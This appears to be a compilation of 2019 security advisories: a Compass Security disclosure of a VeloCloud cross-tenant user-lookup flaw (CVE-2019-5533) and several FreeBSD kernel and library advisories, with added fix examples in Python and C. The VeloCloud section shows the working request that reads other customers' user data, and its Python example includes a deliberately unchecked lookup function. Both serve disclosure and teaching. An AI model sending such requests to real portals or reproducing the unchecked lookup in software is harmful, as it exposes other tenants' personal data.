VeloCloud [1], now part of VMware, is an SD-WAN market leader. VMware SD-WAN
by VeloCloud is a key component of the Virtual Cloud Network and is tightly
integrated with NSX Data Center and NSX Cloud to enable customers to extend
consistent networking and security policies from the data center to the
branch to the cloud. Compass Security [2] identified a vulnerability that
allows a VeloCloud standard admin user to access user information of other
VeloCloud customers.

Affected:
---------
Vulnerable:
3.3.0 and 3.2.2.

Not vulnerable:
3.3.1

No other version was tested, but older versions are believed to be
vulnerable as well.

Technical Description
---------------------
A standard admin user retrieves user information with the following HTTP
request. The request carries an id twice: the JSON-RPC request id, and, in
params, the id of the user to look up. The server does not perform any
authorization check on the params id. Changing it returns the details of the
corresponding user, even when that user belongs to a different VeloCloud
customer.

```
POST /portal/ HTTP/1.1
Host: vco109-usca1.velocloud.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://vco109-usca1.velocloud.net/
Content-Type: application/json
x-vco-privileges-version: 1560945325637
X-Requested-With: XMLHttpRequest
Content-Length: 90
Cookie: culture=en-US; velocloud.session=[CUT-BY-COMPASS]
Connection: close

{"jsonrpc":"2.0","method":"enterpriseUser/getEnterpriseUser","params":{"id":1},"id":1}
```

The following information is returned.
```
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Jun 2019 13:02:11 GMT
Content-Type: application/json
Content-Length: 569
Connection: close
X-Powered-By: Express
Set-Cookie: velocloud.message=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT
x-vco-privileges-version: 1560945325637
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Strict-Transport-Security: max-age=31536000; includeSubdomains;
X-Frame-Options: SAMEORIGIN

{"jsonrpc":"2.0","result":
{
"id":[CUT-BY-COMPASS],
"created":"[CUT-BY-COMPASS]",
"userType":"[CUT-BY-COMPASS]",
"username":"[CUT-BY-COMPASS]",
"domain":[CUT-BY-COMPASS],
"password":"*",
"firstName":[CUT-BY-COMPASS],
"lastName":[CUT-BY-COMPASS],
"officePhone":[CUT-BY-COMPASS],
"mobilePhone":[CUT-BY-COMPASS],
"email":"[CUT-BY-COMPASS]",
"isNative":[CUT-BY-COMPASS],
"isActive":[CUT-BY-COMPASS],
"isLocked":[CUT-BY-COMPASS],
"disableSecondFactor":[CUT-BY-COMPASS],
"lastLogin":"[CUT-BY-COMPASS]",
"modified":"[CUT-BY-COMPASS]",
"passwordModified":"[CUT-BY-COMPASS]",
"enterpriseId":[CUT-BY-COMPASS],
"enterpriseProxyId":[CUT-BY-COMPASS],
"roleId":[CUT-BY-COMPASS],
"roleName":"[CUT-BY-COMPASS]",
"networkId":[CUT-BY-COMPASS],
"isSuper":[CUT-BY-COMPASS]},
"id":[CUT-BY-COMPASS]
}
```

Workaround / Fix:
-----------------
Upgrade to VeloCloud 3.3.1, where the authorization checks are performed 
correctly.
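
What an authorization check on this lookup amounts to, shown as an added
example in Python rather than VeloCloud's code (the vendor's actual change in
3.3.1 is not described in this advisory): the record named by params.id must
belong to the caller's own enterprise, and a foreign id gets the same "no such
user" answer as a non-existent one. The user table, session and enterprise ids
are constructed; the method name and JSON-RPC shape follow the request quoted
above.

```python
"""Tenant-scoped authorization for the enterpriseUser/getEnterpriseUser lookup.
Added example, not VeloCloud code.  The user table, session and enterprise
ids are constructed; the method name and JSON-RPC shape follow the request
quoted in the advisory."""

import json

# Constructed directory of users belonging to two different customers (enterprises).
USERS = {
    1: {"id": 1, "username": "alice", "email": "alice@tenant-a.example", "enterpriseId": 100},
    2: {"id": 2, "username": "bob",   "email": "bob@tenant-a.example",   "enterpriseId": 100},
    3: {"id": 3, "username": "carol", "email": "carol@tenant-b.example", "enterpriseId": 200},
}


def _error(req_id, code, message):
    return {"jsonrpc": "2.0", "error": {"code": code, "message": message}, "id": req_id}


def get_enterprise_user_vulnerable(session, request):
    """The bug pattern: fetch whatever params.id names and return it to the caller."""
    user = USERS.get(request["params"].get("id"))
    if user is None:
        return _error(request.get("id"), -32602, "no such user")
    return {"jsonrpc": "2.0", "result": user, "id": request.get("id")}


def get_enterprise_user_fixed(session, request):
    """Same lookup, but the record must belong to the caller's own enterprise.

    A foreign id gets the same 'no such user' answer as a non-existent one, so
    the endpoint cannot be used to enumerate other customers' user ids either.
    """
    user = USERS.get(request["params"].get("id"))
    if user is None or user["enterpriseId"] != session["enterpriseId"]:
        return _error(request.get("id"), -32602, "no such user")
    return {"jsonrpc": "2.0", "result": user, "id": request.get("id")}


METHODS = {"enterpriseUser/getEnterpriseUser": get_enterprise_user_fixed}


def dispatch(session, body: str) -> str:
    """Minimal JSON-RPC 2.0 entry point: the session comes from the cookie, never the body."""
    try:
        request = json.loads(body)
    except ValueError:
        return json.dumps(_error(None, -32700, "parse error"))
    handler = METHODS.get(request.get("method")) if isinstance(request, dict) else None
    if handler is None or not isinstance(request.get("params"), dict):
        req_id = request.get("id") if isinstance(request, dict) else None
        return json.dumps(_error(req_id, -32601, "method not found"))
    return json.dumps(handler(session, request))


if __name__ == "__main__":
    # Constructed session for alice, a standard admin of enterprise 100.
    session = {"userId": 1, "enterpriseId": 100}
    body = '{"jsonrpc":"2.0","method":"enterpriseUser/getEnterpriseUser","params":{"id":3},"id":1}'
    print(dispatch(session, body))
```

The tenant comes from the authenticated session, never from the request body;
letting the client supply its own enterpriseId would reintroduce the same
bypass one field over.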

Timeline:
---------
2019-10-16: Coordinated public disclosure date
2019-08-26: Assigned CVE-2019-5533
2019-08-21: Release of VeloCloud 3.3.1 which includes a fix for the 
vulnerability
2019-07-02: Initial vendor response
2019-07-01: Initial vendor notification
2019-06-27: Assigned CSNC-2019-007
2019-06-19: Discovery by Silas Bärtsch

References:
-----------
[1] https://www.velocloud.com
[2] https://compass-security.com


FreeBSD Security Advisory FreeBSD-SA-19:23.midi [REVISED]

2019-08-22 Thread FreeBSD Security Advisories
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:23.midi                                       Security Advisory
                                                          The FreeBSD Project

Topic:          kernel memory disclosure from /dev/midistat

Category:       core
Module:         sound
Announced:      2019-08-20
Credits:        Peter Holm, Mark Johnston
Affects:        All supported versions of FreeBSD.
Corrected:      2019-08-20 17:53:16 UTC (stable/12, 12.0-STABLE)
                2019-08-20 17:50:33 UTC (releng/12.0, 12.0-RELEASE-p10)
                2019-08-20 17:54:18 UTC (stable/11, 11.3-STABLE)
                2019-08-20 17:50:33 UTC (releng/11.3, 11.3-RELEASE-p3)
                2019-08-20 17:50:33 UTC (releng/11.2, 11.2-RELEASE-p14)
CVE Name:       CVE-2019-5612

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

0.   Revision history

v1.0   2019-08-20  Initial release.
v1.1   2019-08-21  Updated workaround.

I.   Background

/dev/midistat is a device file which can be read to obtain a
human-readable list of the available MIDI-capable devices in the system.

II.  Problem Description

The kernel driver for /dev/midistat implements a handler for read(2).
This handler is not thread-safe, and a multi-threaded program can
exploit races in the handler to cause it to copy out kernel memory
outside the boundaries of midistat's data buffer.

III. Impact

The races allow a program to read kernel memory within a 4GB window
centered at midistat's data buffer.  The buffer is allocated each
time the device is opened, so an attacker is not limited to a static
4GB region of memory.

On 32-bit platforms, an attempt to trigger the race may cause a page
fault in kernel mode, leading to a panic.

IV.  Workaround

Restrict permissions on /dev/midistat by adding an entry to
/etc/devfs.conf and restarting the service:

# echo "perm midistat 0600" >> /etc/devfs.conf
# service devfs restart

Custom kernels without "device sound" are not vulnerable.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch
# fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch.asc
# gpg --verify midi.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                    Revision
-------------------------------------------------------------------------
stable/12/                                                     r351264
releng/12.0/                                                   r351260
stable/11/                                                     r351265
releng/11.3/                                                   r351260
releng/11.2/                                                   r351260
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5612>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:23.midi.asc>

FreeBSD Security Advisory FreeBSD-SA-19:24.mqueuefs

2019-08-21 Thread FreeBSD Security Advisories
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:24.mqueuefs                                   Security Advisory
                                                          The FreeBSD Project

Topic:          Reference count overflow in mqueue filesystem 32-bit compat

Category:       core
Module:         kernel
Announced:      2019-08-20
Credits:        Karsten König, Secfault Security
Affects:        All supported versions of FreeBSD.
Corrected:      2019-08-20 17:45:22 UTC (stable/12, 12.0-STABLE)
                2019-08-20 17:51:32 UTC (releng/12.0, 12.0-RELEASE-p10)
                2019-08-20 17:46:22 UTC (stable/11, 11.3-STABLE)
                2019-08-20 17:51:32 UTC (releng/11.3, 11.3-RELEASE-p3)
                2019-08-20 17:51:32 UTC (releng/11.2, 11.2-RELEASE-p14)
CVE Name:       CVE-2019-5603

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

Note: This issue is related to the previously disclosed SA-19:15.mqueuefs.
It is another instance of the same bug and as such shares the same CVE.

I.   Background

mqueuefs(5) implements the POSIX message queue file system, which processes
can use as a communication mechanism.

'struct file' represents open files, directories, sockets and other
entities.

II.  Problem Description

System calls operating on file descriptors obtain a reference to the
relevant struct file.  Due to a programming error, that reference was not
always released, which in turn could be used to overflow the reference
counter of the affected struct file.

III. Impact

A local user can use this flaw to obtain access to files, directories,
sockets, etc., opened by processes owned by other users.  If the obtained
struct file represents a directory from outside of the user's jail, it can
be used to access files outside of the jail.  If the user in question is
a jailed root, they can obtain root privileges on the host system.

IV.  Workaround

No workaround is available.  Note that the mqueuefs file system is not
enabled by default.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:24/mqueuefs.patch
# fetch https://security.FreeBSD.org/patches/SA-19:24/mqueuefs.patch.asc
# gpg --verify mqueuefs.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r351255
releng/12.0/  r351261
stable/11/r351257
releng/11.3/  r351261
releng/11.2/  r351261
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References



<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5603>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:24.mqueuefs.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:23.midi

2019-08-21 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:23.midi   Security Advisory
  The FreeBSD Project

Topic:  kernel memory disclosure from /dev/midistat

Category:   core
Module: sound
Announced:  2019-08-20
Credits:Peter Holm, Mark Johnston
Affects:All supported versions of FreeBSD.
Corrected:  2019-08-20 17:53:16 UTC (stable/12, 12.0-STABLE)
2019-08-20 17:50:33 UTC (releng/12.0, 12.0-RELEASE-p10)
2019-08-20 17:54:18 UTC (stable/11, 11.3-STABLE)
2019-08-20 17:50:33 UTC (releng/11.3, 11.3-RELEASE-p3)
2019-08-20 17:50:33 UTC (releng/11.2, 11.2-RELEASE-p14)
CVE Name:   CVE-2019-5612

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

/dev/midistat is a device file which can be read to obtain a
human-readable list of the available MIDI-capable devices in the system.

II.  Problem Description

The kernel driver for /dev/midistat implements a handler for read(2).
This handler is not thread-safe, and a multi-threaded program can
exploit races in the handler to cause it to copy out kernel memory
outside the boundaries of midistat's data buffer.

III. Impact

The races allow a program to read kernel memory within a 4GB window
centered at midistat's data buffer.  The buffer is allocated each
time the device is opened, so an attacker is not limited to a static
4GB region of memory.

On 32-bit platforms, an attempt to trigger the race may cause a page
fault in kernel mode, leading to a panic.

IV.  Workaround

No workaround is available.  Custom kernels without "device sound"
are not vulnerable.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch
# fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch.asc
# gpg --verify midi.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r351264
releng/12.0/  r351260
stable/11/r351265
releng/11.3/  r351260
releng/11.2/  r351260
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References



<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5612>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:23.midi.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:22.mbuf

2019-08-21 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:22.mbuf   Security Advisory
  The FreeBSD Project

Topic:  IPv6 remote Denial-of-Service

Category:   kernel
Module: net
Announced:  2019-08-20
Credits:Clement Lecigne
Affects:All supported versions of FreeBSD.
Corrected:  2019-08-10 00:01:25 UTC (stable/12, 12.0-STABLE)
2019-08-20 17:49:33 UTC (releng/12.0, 12.0-RELEASE-p10)
2019-08-10 00:02:45 UTC (stable/11, 11.3-STABLE)
2019-08-20 17:49:33 UTC (releng/11.3, 11.3-RELEASE-p3)
2019-08-20 17:49:33 UTC (releng/11.2, 11.2-RELEASE-p14)
CVE Name:   CVE-2019-5611

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

mbufs are a unit of memory management mostly used in the kernel for network
packets and socket buffers.  m_pulldown(9) is a function to arrange the data
in a chain of mbufs.

II.  Problem Description

Due to a missing check in the code of m_pulldown(9), the data returned may
not be contiguous as requested by the caller.

III. Impact

Extra checks in the IPv6 code catch the error condition and trigger a kernel
panic leading to a remote DoS (denial-of-service) attack with certain
Ethernet interfaces.  At this point it is unknown if any other than the IPv6
code paths can trigger a similar condition.

IV.  Workaround

For the currently known attack vector, systems with IPv6 not enabled are not
vulnerable.

On systems with IPv6 active, IPv6 fragmentation may be disabled, or
a firewall can be used to filter out packets with certain or excessive
amounts of extension headers in a first fragment.  These rules may be
dependent on the operational needs of each site.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:22/mbuf.patch
# fetch https://security.FreeBSD.org/patches/SA-19:22/mbuf.patch.asc
# gpg --verify mbuf.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r350828
releng/12.0/  r351259
stable/11/r350829
releng/11.3/  r351259
releng/11.2/  r351259
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=238787>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5611>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:22.mbuf.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:21.bhyve

2019-08-06 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:21.bhyve  Security Advisory
  The FreeBSD Project

Topic:  Insufficient validation of guest-supplied data (e1000 device)

Category:   core
Module: bhyve
Announced:  2019-08-06
Credits:Reno Robert
Affects:All supported versions of FreeBSD.
Corrected:  2019-08-05 22:04:16 UTC (stable/12, 12.0-STABLE)
2019-08-06 17:13:17 UTC (releng/12.0, 12.0-RELEASE-p9)
2019-08-05 22:04:16 UTC (stable/11, 11.3-STABLE)
2019-08-06 17:13:17 UTC (releng/11.3, 11.3-RELEASE-p2)
2019-08-06 17:13:17 UTC (releng/11.2, 11.2-RELEASE-p13)
CVE Name:   CVE-2019-5609

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

bhyve(8) is a hypervisor that supports running a variety of guest operating
systems in virtual machines.  bhyve(8) includes an emulated Intel 82545
network interface adapter ("e1000").

II.  Problem Description

The e1000 network adapters permit a variety of modifications to an Ethernet
packet when it is being transmitted.  These include the insertion of IP and
TCP checksums, insertion of an Ethernet VLAN header, and TCP segmentation
offload ("TSO").  The e1000 device model uses an on-stack buffer to generate
the modified packet header when simulating these modifications on transmitted
packets.

When TCP segmentation offload is requested for a transmitted packet, the
e1000 device model used a guest-provided value to determine the size of the
on-stack buffer without validation.  The subsequent header generation could
overflow an incorrectly sized buffer or dereference a pointer composed of
stack garbage.

III. Impact

A misbehaving bhyve guest could overwrite memory in the bhyve process on the
host.

IV.  Workaround

Only the e1000 device model is affected; the virtio-net device is not
affected by this issue.  If supported by the guest operating system,
presenting only the virtio-net device to the guest is a suitable workaround.
No workaround is available if the e1000 device model is required.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and restart any affected virtual machines.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:21/bhyve.patch
# fetch https://security.FreeBSD.org/patches/SA-19:21/bhyve.patch.asc
# gpg --verify bhyve.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the applicable virtual machines, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r350619
releng/12.0/  r350647
stable/11/r350619
releng/11.3/  r350647
releng/11.2/  r350647
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5609>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:21.bhyve.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:20.bsnmp

2019-08-06 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:20.bsnmp  Security Advisory
  The FreeBSD Project

Topic:  Insufficient message length validation in bsnmp library

Category:   contrib
Module: bsnmp
Announced:  2019-08-06
Credits:Guido Vranken 
Affects:All supported versions of FreeBSD.
Corrected:  2019-08-06 16:11:16 UTC (stable/12, 12.0-STABLE)
2019-08-06 17:12:17 UTC (releng/12.0, 12.0-RELEASE-p9)
2019-08-06 16:12:43 UTC (stable/11, 11.3-STABLE)
2019-08-06 17:12:17 UTC (releng/11.3, 11.3-RELEASE-p2)
2019-08-06 17:12:17 UTC (releng/11.2, 11.2-RELEASE-p13)
CVE Name:   CVE-2019-5610

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The bsnmp software library is used for the Internet SNMP (Simple Network
Management Protocol).  As part of this it includes functions to handle ASN.1
(Abstract Syntax Notation One).

II.  Problem Description

A function extracting the length from type-length-value encoding is not
properly validating the submitted length.
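As an added illustration of the check this advisory describes (example code written for this page, not bsnmp's own), the following C decoder validates a BER type-length-value length field against the bytes actually remaining before any value is consumed; the function names (tlv_decode_length, tlv_count, tlv_length_or_error) and the two sample messages are constructed for the example.

```c
/* Added example for this page: a BER length decoder that refuses any
 * length the remaining buffer cannot back.  Not bsnmp code. */
#include <stddef.h>
#include <stdint.h>

/* Result codes for tlv_decode_length(). */
enum { TLV_OK = 0, TLV_TRUNCATED = -1, TLV_BAD_LENGTH = -2 };

/*
 * Decode the BER length octets that follow a tag byte.
 *   buf, avail : bytes remaining after the tag
 *   *lenp      : decoded content length       (valid only on TLV_OK)
 *   *hdrp      : number of length octets used (valid only on TLV_OK)
 * The decoded value is accepted only if the content it announces lies
 * entirely inside the remaining buffer.  That comparison is the check
 * a decoder must make before trusting a submitted length.
 */
int
tlv_decode_length(const uint8_t *buf, size_t avail, size_t *lenp, size_t *hdrp)
{
	size_t len, hdr;

	if (avail < 1)
		return TLV_TRUNCATED;
	if ((buf[0] & 0x80) == 0) {
		/* short form: a single octet carrying 0..127 */
		len = buf[0];
		hdr = 1;
	} else {
		/* long form: low 7 bits count the length octets that follow */
		size_t n = buf[0] & 0x7f;

		if (n == 0 || n > sizeof(size_t))
			return TLV_BAD_LENGTH;	/* indefinite form, or wider than size_t */
		if (avail - 1 < n)
			return TLV_TRUNCATED;	/* the length octets themselves are cut off */
		len = 0;
		for (size_t i = 0; i < n; i++)
			len = (len << 8) | buf[1 + i];
		hdr = 1 + n;
	}
	/* the essential check: the value must fit in what is left */
	if (len > avail - hdr)
		return TLV_BAD_LENGTH;
	*lenp = len;
	*hdrp = hdr;
	return TLV_OK;
}

/* Convenience for callers that only want the length: it, or the negative code. */
long
tlv_length_or_error(const uint8_t *buf, size_t avail)
{
	size_t len, hdr;
	int rc = tlv_decode_length(buf, avail, &len, &hdr);

	return rc == TLV_OK ? (long)len : rc;
}

/*
 * Walk a run of sibling TLVs (the members of a SEQUENCE, say) and return
 * how many there are, or -1 as soon as one announces more bytes than the
 * buffer holds.  Because each length is validated first, the walk never
 * reads past buf + avail.
 */
int
tlv_count(const uint8_t *buf, size_t avail)
{
	int count = 0;

	while (avail > 0) {
		size_t len, hdr;

		/* buf[0] is the tag; the length octets start at buf[1] */
		if (tlv_decode_length(buf + 1, avail - 1, &len, &hdr) != TLV_OK)
			return -1;
		buf += 1 + hdr + len;
		avail -= 1 + hdr + len;
		count++;
	}
	return count;
}

/* Constructed sample: SEQUENCE { INTEGER 0, OCTET STRING "public" },
 * the shape of an SNMPv1 message header. */
const uint8_t sample_ok[] = {
	0x30, 0x0b,				/* SEQUENCE, 11 bytes follow */
	0x02, 0x01, 0x00,			/* INTEGER version = 0 */
	0x04, 0x06, 'p', 'u', 'b', 'l', 'i', 'c'	/* OCTET STRING community */
};

/* Constructed sample: the same message, but the OCTET STRING claims 0x60
 * (96) bytes while only six remain.  A decoder that trusts the field
 * would read 90 bytes past the end of the buffer; tlv_count() on the
 * SEQUENCE members rejects it instead. */
const uint8_t sample_overlong[] = {
	0x30, 0x0b,
	0x02, 0x01, 0x00,
	0x04, 0x60, 'p', 'u', 'b', 'l', 'i', 'c'
};
```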

III. Impact

A remote user could cause, for example, an out-of-bounds read or the decoding
of unrelated data, or trigger a crash of software such as bsnmpd, resulting
in a denial of service.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:20/bsnmp.patch
# fetch https://security.FreeBSD.org/patches/SA-19:20/bsnmp.patch.asc
# gpg --verify bsnmp.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.

Restart all daemons that use the library, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r350637
releng/12.0/  r350646
stable/11/r350638
releng/11.3/  r350646
releng/11.2/  r350646
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5610>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:20.bsnmp.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:19.mldv2

2019-08-06 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:19.mldv2  Security Advisory
  The FreeBSD Project

Topic:  ICMPv6 / MLDv2 out-of-bounds memory access

Category:   core
Module: net
Announced:  2019-08-06
Credits:CJD of Apple
Affects:All supported versions of FreeBSD.
Corrected:  2019-08-06 17:13:41 UTC (stable/12, 12.0-STABLE)
2019-08-06 17:11:17 UTC (releng/12.0, 12.0-RELEASE-p9)
2019-08-06 17:15:46 UTC (stable/11, 11.3-STABLE)
2019-08-06 17:11:17 UTC (releng/11.3, 11.3-RELEASE-p2)
2019-08-06 17:11:17 UTC (releng/11.2, 11.2-RELEASE-p13)
CVE Name:   CVE-2019-5608

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

MLDv2 is the Multicast Listener Discovery protocol, version 2.  It is used
by IPv6 routers to discover multicast listeners.

II.  Problem Description

The ICMPv6 input path incorrectly handles cases where an MLDv2 listener
query packet is internally fragmented across multiple mbufs.
